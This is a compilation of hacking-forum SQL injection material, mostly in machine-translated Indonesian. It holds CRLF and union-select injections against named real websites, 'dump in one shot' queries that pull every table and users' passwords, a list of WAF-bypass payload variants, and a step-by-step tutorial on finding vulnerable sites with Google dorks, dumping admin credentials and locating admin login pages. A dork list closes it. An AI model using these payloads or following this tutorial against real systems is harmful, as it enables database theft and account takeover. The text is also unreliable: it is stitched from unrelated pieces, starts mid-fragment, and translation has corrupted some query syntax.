3940Bagi mereka yang bertanya-tanya, pengembalian pengangkutan dan feed garis berbeda dari kembali pada hari-hari Mesin Ketik, ketika pengembalian carriage dan feed baris adalah dua hal yang berbeda. Satu akan membawa Anda ke awal baris (Carriage Return) dan satu akan memindahkan Anda satu baris lebih rendah, tetapi di lokasi horizontal yang sama (Line Feed)
3941Teknik CRLF
3942Sintaks:
3943Kode PHP:
3944% 0A% 0D + Pernyataan Mysql +% 0A% 0D
3945? id = -2 +% 0A% 0D / *!% 0A% 0Dunion * / +% 0A% 0D / *! 50000Pilih * /% 0A% 0D / *! + 77771,77772, unhex (hex (/ *! kata sandi * /)), 77774 + dari + / *! `Users` * / - -
3946Contoh di URL:
3947fpchurch.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 -
3948[9] Kesalahan Fatal Terjadi melewati
3949untuk memahami bagaimana kami dapat melewati Fatal Error Terjadi lihat Contoh ini:
3950Contoh di URL:
3951http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8--
3952Yang disimpulkan bahwa kesalahan dalam struktur salah satu kolom Untuk menghindari kesalahan ini cobalah mengubah nilai kolom kolom kata null satu per satu: -
3953Kode PHP:
3954http://wwfa.org.uk/article.php?id=-174 UNION SELECT null, 2,3,4,5,6,7,8-- Kesalahan
3955http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1, null, 3,4,5,6,7,8-- Kesalahan
3956http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2, null, 4,5,6,7,8-- Kesalahan
3957http://wwfa.org.uk/article.
3958
3959DIOS Query Collections
3960
3961
39621. Show All Database --->
3963
3964(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=/*!50000concat*/(@a,schema_name,'
3965'))))a)
3966
39672.Show All Tables --->
3968
3969(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=/*!50000concat*/(@a,table_name,'
3970'))))a)
3971
39723. Show All Tables without information_schema ---->
3973
3974(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_name,'
3975'))))a)
3976
3977
39784. Show All Database and Tables --->
3979
3980(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_schema,0x3a,table_name,'
3981'))))a)
3982
3983
39845. Show All Database and Tables and Columns --->
3985
3986(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_schema,' > ',table_name,' > ',column_name,'
3987'))))a)
3988
3989
39906.Show Target Hacker Tables Name ---->
3991
3992
3993(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'Hacker_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'
3994'))))a)
3995
3996
39977.Show Each Table and All Table Columns ---->
3998
3999(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'',column_name), (column_name))))))a)
4000
40018. Show Each Table with Row Count and All Table Columns ---->
4002
4003(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
4004',column_name), (column_name))))))a)
4005
4006
40079. Show Each Table with Row Count & number order and All Table Columns --->
4008
4009(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
4010',column_name), (column_name))))))a)
4011
4012Or
4013
4014Bypass -->
4015
4016(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345'%69nformation_schema'*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)
4017
4018
401910. Extract Column Data from Table ------>
4020
4021(select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
4022
4023-h4rh4r
4024
4025Sql Injection types
40261. Error Based Injections (Union Select)
40271. String
40282. Intiger
40292. Error Based Injections (Double Injection Based)
40303. BLIND Injections:
40311.Boolian Based
40322.Time Based
40334. Update Query Injection.
40345. Insert Query Injections.
40356. Header Injections.
40361.Referer based.
40372.UserAgent based.
40383.Cookie based.
4039
4040MYSQL INJECTION - BYPASS UNION SELECT (WAF)
4041WHAT IS BYPASS : when target having WAF (web application firewall) secure encption or security on there server its cannot be directly get any vulnerble columns or its cannot be injeCted! so there haCker try to put diffrent query in combined charachaters encrpted,encoded,modifyed sql query parameters like one called UNION SELECT or UNION ALL SELECT!
4042there is all types of waf bypass method for bypass union select!
4043%55nion(%53elect 1,2,3)-- -
4044+union+distinct+select+
4045+union+distinctROW+select+
4046/**//*!12345UNION SELECT*//**/
4047/**//*!50000UNION SELECT*//**/
4048/**/UNION/**//*!50000SELECT*//**/
4049/*!50000UniON SeLeCt*/
4050union /*!50000%53elect*/
4051+ #‎union + #‎select
4052+ #‎1q %0AuNiOn all#qa%0A#%0AsEleCt
4053/*!%55NiOn*/ /*!%53eLEct*/
4054/*!u%6eion*//*!se%6cect*/
4055+un/**/ion+se/**/lect
4056uni%0bon+se%0blect
4057%2f**%2funion%2f**%2fselect
4058union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
4059REVERSE(noinu)+REVERSE(tceles)
4060/*--*/union/*--*/select/*--*/
4061union(/*!/**/SeleCT */ 1,2,3)
4062/*!union*/+/*!select*/
4063union+/*!select*/
4064/**/union/**/select/**/
4065/**/uNIon/**/sEleCt/**/
4066/**//*!union*//**//*!select*//**/
4067/*!uNIOn*//*!SelECt*/
4068+union+distinct+select+
4069+union+distinctROW+select+
4070uNiOn aLl sElEcT
4071if you got errors! please dnt loose hope! because in haCking! hope is your mirror of future in this ethical word lol i dnt want to be jesus forget these lines and try all method i m sure u got success soon! best of luck happy haCking! ;-)
4072
4073~h4rh4r
4074
4075Di sini Anda akan menemukan tutorial langkah demi langkah yang sangat detail yang ditulis oleh saya (PhortyPhour) tentang injeksi SQL. Ini murni untuk tujuan pendidikan dan akan digunakan atas kebijaksanaan pembaca.
4076
4077Pertama kita harus tahu persis apa itu injeksi SQL.
4078
4079Injeksi SQL adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi di lapisan basis data aplikasi. Kerentanan hadir ketika input pengguna salah difilter untuk karakter string literal escape yang tertanam dalam pernyataan SQL atau input pengguna tidak diketik kuat dan dengan demikian secara tidak terduga dieksekusi. Ini adalah contoh dari kelas kerentanan yang lebih umum yang dapat terjadi setiap kali salah satu pemrograman atau bahasa scripting tertanam di dalam yang lain. Serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.
4080
4081Itu adalah paragraf pertama dari halaman wikipedia untuk SQLi (injeksi SQL) ditemukan di sini:
4082http://en.wikipedia.org/wiki/SQL_injection
4083
4084Saya akan menyarankan membaca seluruh halaman.
4085
4086Apa yang dicakup dalam tutorial ini?
4087
4088Bagian Satu - Penilaian Situs Web
4089Bagian Satu - Menemukan situs web yang rentan
4090Bagian Dua - Menentukan jumlah kolom
4091Bagian Tiga - Menemukan kolom mana yang rentan
4092
4093Bagian Dua - Mengumpulkan Informasi
4094Bagian Satu - Menentukan versi SQL
4095Bagian Dua - Menemukan basis data
4096
4097Bagian Tiga - The Good Stuff
4098Bagian Satu - Menemukan nama-nama tabel
4099Bagian Dua - Menemukan nama-nama kolom
4100Bagian Tiga - Menampilkan isi kolom
4101Bagian Empat - Mencari halaman admin
4102
4103Sekarang mari kita mulai.
4104
4105Bagian Satu - Penilaian Situs Web
4106
4107Agar kami dapat mulai mengeksploitasi situs web, pertama-tama kami harus tahu persis apa yang kami suntikkan. Inilah yang akan kami bahas di Bagian Satu bersama dengan cara menilai informasi yang kami kumpulkan.
4108
4109Bagian Satu - Menemukan situs web yang rentan
4110
4111Situs web yang rentan dapat ditemukan menggunakan dorks (saya akan menyertakan daftar di akhir tutorial ini), baik di Google atau dengan pemindai eksploit. Bagi Anda yang tidak terbiasa dengan istilah "dorks", saya akan mencoba menjelaskan.
4112
4113Dorks adalah URL situs web yang dikenal rentan. Dalam injeksi SQL, dorks ini terlihat seperti ini:
4114
4115Kode:
4116inurl: buy.php? id =
4117
4118Ini akan dimasukkan ke mesin pencari dan karena "inurl:" bagian dari dork, mesin pencari akan mengembalikan hasil dengan URL yang berisi karakter yang sama. Beberapa situs yang memiliki dork ini di situs web mereka mungkin rentan terhadap injeksi SQL.
4119
4120Sekarang katakanlah kami menemukan halaman:
4121
4122Kode:
4123http://www.site.com/buy.php?id=1
4124
4125Untuk menguji situs ini, yang perlu kita lakukan adalah menambahkan 'baik di antara tanda "=" dan "1" atau setelah "1" sehingga terlihat seperti ini:
4126
4127Kode:
4128http://www.site.com/buy.php?id=1 '
4129atau
4130http://www.site.com/buy.php?id='1
4131
4132Setelah menekan enter, jika situs web ini mengembalikan kesalahan seperti berikut:
4133
4134Kode:
4135Peringatan: mysql_fetch_array (): argumen yang disediakan bukanlah sumber daya hasil MySQL yang valid di /home1/michafj0/public_html/gallery.php on line 7
4136
4137Atau sesuatu di sepanjang garis itu, ini berarti rentan terhadap injeksi.
4138
4139Dalam kasus di mana Anda menemukan situs web seperti ini:
4140
4141Kode:
4142http://www.site.com/buy.php?id=1&dog;catid=2
4143
4144Maka Anda harus menggunakan teknik yang sama dengan menambahkan 'kecuali itu harus antara nilai (dalam hal ini nomor) dan operator ("=" tanda) sehingga terlihat seperti ini:
4145
4146Kode:
4147http://www.site.com/buy.php?id='1&dog;catid='2
4148
4149Ada program yang akan melakukan ini untuk Anda tetapi untuk memulai saya akan menyarankan hanya untuk melakukan hal-hal secara manual, menggunakan Google, dan jadi saya tidak akan memposting apa pun untuk Anda. Jika Anda merasa sangat terpaksa untuk menggunakan satu lagi. Saya merekomendasikan Exploit Scanner oleh Reiluke.
4150
4151Bagian Dua - Menentukan jumlah kolom
4152
4153Agar kami dapat menggunakan perintah dan mendapatkan hasil, kami harus tahu berapa banyak kolom yang ada di situs web. Jadi untuk menemukan jumlah kolom kita harus menggunakan metode yang sangat kompleks dan canggih yang saya suka sebut "Trial and Error" dengan perintah ORDER BY Biggrin
4154
4155CATATAN: SQL tidak peduli apakah huruf Anda dikapitalisasi atau tidak dan saya hanya melakukannya karena kejelasan, karena semua yang peduli pertanyaan Anda bisa terlihat seperti ini:
4156
4157Kode:
4158http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz dan ThX
4159
4160TIDAK MASALAH (btw tolong jangan berpikir itu adalah perintah yang sebenarnya).
4161
4162Jadi kembali ke perintah ORDER BY. Untuk menemukan jumlah kolom, kami menulis kueri dengan nilai inkrementing hingga kami mendapatkan kesalahan, seperti ini:
4163
4164Kode:
4165http://www.site.com/buy.php?id=1 ORDER BY 1-- <--- Tidak ada kesalahan
4166http://www.site.com/buy.php?id=1 ORDER BY 2-- <--- Tidak ada kesalahan
4167http://www.site.com/buy.php?id=1 ORDER BY 3-- <--- Tidak ada kesalahan
4168http://www.site.com/buy.php?id=1 ORDER BY 4-- <--- Tidak ada kesalahan
4169http://www.site.com/buy.php?id=1 ORDER BY 5-- <--- ERROR!
4170
4171Ini berarti ada empat kolom!
4172
4173JANGAN LUPA UNTUK MENGUNGKAPKAN NULL DOUBLE (-) SETELAH QUERY.
4174SANGAT PENTING!
4175
4176Bagian Tiga - Menemukan kolom mana yang rentan
4177
4178Jadi kita tahu bahwa ada empat kolom sekarang kita harus mencari tahu mana yang rentan terhadap injeksi. Untuk melakukan ini, kami menggunakan UNION dan SELECT queries sambil mempertahankan double null (-) di akhir string. Ada juga perbedaan lain yang berukuran kecil tetapi tidak penting, lihat apakah Anda dapat menemukannya.
4179
4180Kode:
4181http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--
4182
4183Jika Anda tidak dapat menemukan perbedaannya, ini adalah nol tambahan di antara tanda "=" dan nilai (nomor).
4184
4185buy.php? id = -1
4186
4187Sekarang setelah memasukkan pertanyaan itu Anda harus dapat melihat beberapa angka di suatu tempat di halaman yang tampaknya tidak pada tempatnya. Itu adalah jumlah kolom yang rentan terhadap injeksi. Kita dapat menggunakan kolom-kolom itu untuk menarik informasi dari database yang akan kita lihat di Bagian Dua.
4188
4189Bagian Dua - Mengumpulkan Informasi
4190
4191Pada bagian ini kita akan menemukan bagaimana menemukan nama database dan versi SQL apa yang digunakan situs web dengan menggunakan kueri untuk mengeksploitasi situs.
4192
4193Bagian Satu - Menentukan versi SQL.
4194
4195Menemukan versi SQL dari situs web adalah langkah yang sangat penting karena langkah yang Anda ambil untuk versi 4 cukup berbeda dari versi 5 untuk mendapatkan apa yang Anda inginkan. Dalam tutorial ini, saya tidak akan membahas versi 4 karena ini adalah permainan menebak dan untuk jenis situs yang masih menggunakannya, itu tidak sebanding dengan waktu Anda.
4196
4197Jika kita melihat kembali ke akhir Bagian Tiga di Bagian Satu kita melihat bagaimana menemukan kolom yang rentan. Menggunakan informasi itu kita dapat mengumpulkan pertanyaan berikutnya (saya akan menggunakan kolom 2). Perintah akan terlihat seperti ini:
4198
4199Kode:
4200http://www.site.com/buy.php?id=-1 UNION SELECT 1, @@ version, 3,4--
4201
4202Karena 2 adalah kolom rentan, di sinilah kita akan menempatkan "@@ version". String lain yang dapat menggantikan "@@ version" adalah "versi ()".
4203
4204Jika situs web masih tidak menampilkan versi coba menggunakan unhex (hex ()) yang terlihat seperti ini:
4205
4206Kode:
4207http://www.site.com/buy.php?id=-1 UNION SELECT 1, unhex (hex (@@ version)), 3,4--
4208
4209CATATAN: Jika metode ini harus digunakan di sini, itu harus digunakan untuk sisa suntikan juga.
4210
4211Sekarang apa yang ingin Anda lihat adalah sesuatu di bawah garis-garis ini:
4212
4213Kode:
42145.1.47-komunitas-log
4215
4216Yang merupakan versi dari SQL untuk situs web.
4217
4218CATATAN: Jika Anda melihat versi 4 dan Anda ingin mencobanya, ada tutorial lain yang menjelaskan cara menyuntikkannya.
4219
4220Bagian Dua - Menemukan basis data
4221
4222Menemukan nama basis data tidak selalu merupakan langkah yang diperlukan untuk mengumpulkan informasi yang Anda inginkan, namun dalam pengalaman saya mengikuti langkah-langkah ini dan menemukan basis data terkadang dapat menghasilkan tingkat keberhasilan yang lebih tinggi.
4223
4224Untuk menemukan database kami menggunakan query seperti yang di bawah ini:
4225
4226Kode:
4227http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (schema_name), 3,4 dari information_schema.schemata--
4228
4229Ini terkadang menghasilkan lebih banyak hasil daripada yang diperlukan dan saat itulah kami beralih ke kueri ini:
4230
4231Kode:
4232http://www.site.com/buy.php?id=-1 UNION SELECT 1, concat (database ()), 3,4--
4233
4234Selamat! Anda sekarang memiliki nama database! Salin dan tempelkan nama di suatu tempat yang aman, kita akan membutuhkannya nanti.
4235
4236Bagian Tiga - The Good Stuff
4237
4238Ini adalah bagian yang menyenangkan di mana kami akan menemukan nama pengguna, email, dan kata sandi!
4239
4240Bagian Satu - Menemukan nama-nama tabel
4241
4242Untuk menemukan nama tabel kami menggunakan query yang mirip dengan yang digunakan untuk mencari database dengan sedikit tambahan tambahan:
4243
4244Kode:
4245http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (table_name), 3,4 FROM information_schema.tables WHERE table_schema = database () -
4246
4247Mungkin terlihat panjang dan membingungkan tetapi setelah Anda memahaminya, itu tidak benar-benar saya akan coba jelaskan. Apa yang dilakukan oleh query ini adalah "groups" (group_concat) "nama tabel" (nama_tabel) bersama-sama dan mengumpulkan informasi tersebut "dari" (FROM) information_schema.tables di mana "skema tabel" (table_schema) dapat ditemukan di "basis data "(database ()).
4248
4249CATATAN: Saat menggunakan group_concat Anda hanya akan dapat melihat tabel 1024 karakter, jadi jika Anda melihat bahwa tabel terputus pada saklar akhir untuk membatasi yang akan saya jelaskan sekarang.
4250
4251Kode:
4252http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 FROM information_schema.tables WHERE table_schema = database () LIMIT 0,1--
4253
4254Apa yang dilakukan adalah menampilkan tabel pertama dan satu-satunya yang pertama. Jadi jika kita kehabisan karakter, katakanlah tabel ke-31 kita bisa menggunakan query ini:
4255
4256Kode:
4257http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 FROM information_schema.tables WHERE table_schema = database () LIMIT 30,1--
4258
4259Perhatikan bagaimana batas saya adalah 30,1 bukannya 31,1? Ini karena ketika menggunakan batas dimulai dari 0,1 yang berarti bahwa ke-30 sebenarnya adalah Tongue ke-31
4260
4261Anda sekarang memiliki semua nama tabel!
4262
4263
4264Bagian Dua - Menemukan nama-nama kolom
4265
4266Sekarang setelah Anda memiliki semua nama tabel coba dan pilih salah satu yang menurut Anda akan berisi informasi berair. Biasanya mereka adalah tabel seperti User (s), Admin (s), tblUser (s) dan sebagainya tetapi itu bervariasi antar situs.
4267
4268Setelah menentukan tabel mana yang menurut Anda berisi informasi, gunakan kueri ini (dalam contoh saya, saya akan menggunakan nama tabel "Admin"):
4269
4270Kode:
4271http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = "Admin" -
4272
4273Ini akan memberi Anda daftar semua kolom di dalam tabel atau memberi Anda kesalahan tetapi jangan panik jika hasilnya # 2! Semua ini berarti bahwa Kutipan Sihir diaktifkan. Ini dapat dilewati dengan menggunakan hex atau char converter (keduanya berfungsi) untuk mengonversi teks normal menjadi char atau hex (tautan ke situs web yang melakukan ini akan dimasukkan di akhir tutorial).
4274
4275PEMBARUAN: Jika Anda mendapatkan kesalahan pada titik ini, yang harus Anda lakukan adalah ikuti langkah-langkah berikut:
4276
42771. Salin nama tabel yang Anda coba akses.
42782. Tempelkan nama tabel ke dalam situs web ini yang bertuliskan "Say Hello To My Little Friend".
4279Konverter Hex / Char
4280http://www.swingnote.com/tools/texttohex.php
42813. Klik konversikan.
42824. Salin string angka / huruf di bawah Hex ke dalam kueri Anda sehingga terlihat seperti ini:
4283
4284Kode:
4285http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = 0x41646d696e--
4286
4287Perhatikan bagaimana sebelum saya menempelkan hex saya menambahkan "0x", semua ini memberitahu server bahwa karakter berikut adalah bagian dari string hex.
4288
4289Anda sekarang harus melihat daftar semua kolom dalam tabel seperti nama pengguna, kata sandi, dan email.
4290
4291CATATAN: Menggunakan fungsi batas berfungsi dengan kolom juga.
4292
4293Bagian Tiga - Menampilkan isi kolom
4294
4295Kami hampir selesai! Yang harus kita lakukan adalah melihat apa yang ada di dalam kolom itu dan menggunakan informasi untuk masuk! Untuk melihat kolom yang kita butuhkan untuk memutuskan mana yang ingin kita lihat dan kemudian menggunakan query ini (dalam contoh ini saya ingin melihat kolom "username", "password", dan "email", dan nama database saya akan "db123 "). Di sinilah nama database berguna:
4296
4297Kode:
4298http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (nama pengguna, 0x3a, kata sandi, 0x3a, email), 3,4 DARI db123.Admin--
4299
4300Dalam query ini, 0x3a adalah nilai hex dari titik dua (:) yang akan mengelompokkan username: password: email untuk masing-masing pengguna begitu saja.
4301
4302AKHIRNYA! Sekarang Anda memiliki informasi login untuk pengguna situs, termasuk admin. Yang harus Anda lakukan sekarang adalah menemukan halaman login admin yang membawa kita ke Bagian Empat.
4303
4304Bagian Empat - Mencari halaman admin
4305
4306Biasanya halaman admin akan langsung dari halaman beranda situs, berikut beberapa contohnya:
4307
4308Kode:
4309http://www.site.com/admin
4310http://www.site.com/adminlogin
4311http://www.site.com/modlogin
4312http://www.site.com/moderator
4313
4314Sekali lagi ada program yang akan menemukan halaman untuk Anda tetapi pertama-tama cobalah beberapa tebakan dasar, itu mungkin menghemat beberapa klik. Jika Anda menggunakan program Reiluke telah mengkodekan satu untuk itu juga. Cari Admin Finder oleh Reiluke.
4315
4316Dan itu termasuk tutorial saya! Saya harap ini bermanfaat bagi sebagian dari Anda. Ingatlah untuk terus berlatih dan akhirnya Anda akan memiliki semua pertanyaan yang dihafalkan dalam waktu singkat!
4317
4318Komentar dan Nilai!
4319
4320Berikan kredit di mana kredit jatuh tempo!
4321
4322Saya menepati janji saya jadi di sini adalah apa yang saya katakan akan saya sertakan:
4323
4324Daftar Dork
4325trainers.php? id =
4326article.php? ID =
4327play_old.php? id =
4328declaration_more.php? decl_id =
4329Pageid =
4330games.php? id =
4331newsDetail.php? id =
4332staff_id =
4333historialeer.php? num =
4334product-item.php? id =
4335news_view.php? id =
4336humor.php? id =
4337communique_detail.php? id =
4338sem.php3? id =
4339opinions.php? id =
4340spr.php? id =
4341pages.php? id =
4342chappies.php? id =
4343prod_detail.php? id =
4344viewphoto.php? id =
4345view.php? id =
4346website.php? id =
4347hosting_info.php? id =
4348gery.php? id =
4349detail.php? ID =
4350publikasi.php? id =
4351Productinfo.php? Id =
4352releases.php? id =
4353ray.php? id =
4354produit.php? id =
4355pop.php? id =
4356shopping.php? id =
4357productdetail.php? id =
4358post.php? id =
4359section.php? id =
4360theme.php? id =
4361page.php? id =
4362shredder-categories.php? id =
4363product_ranges_view.php? ID =
4364shop_category.php? id =
4365channel_id =
4366newsid =
4367news_display.php? getid =
4368ages.php? id =
4369clanek.php4? id =
4370review.php? id =
4371iniziativa.php? in =
4372kurikulum.php? id =
4373labels.php? id =
4374lihat.php? ID =
4375galeri_info.php? l =
4376tekst.php? idt =
4377newscat.php? id =
4378newsticker_info.php? idn =
4379rubrika.php? idr =
4380offer.php? idf =
4381
4382Ada daftar dork yang lebih luas yang dapat ditemukan.
4383
4384Konverter Hex / Char
4385http://www.swingnote.com/tools/texttohex.php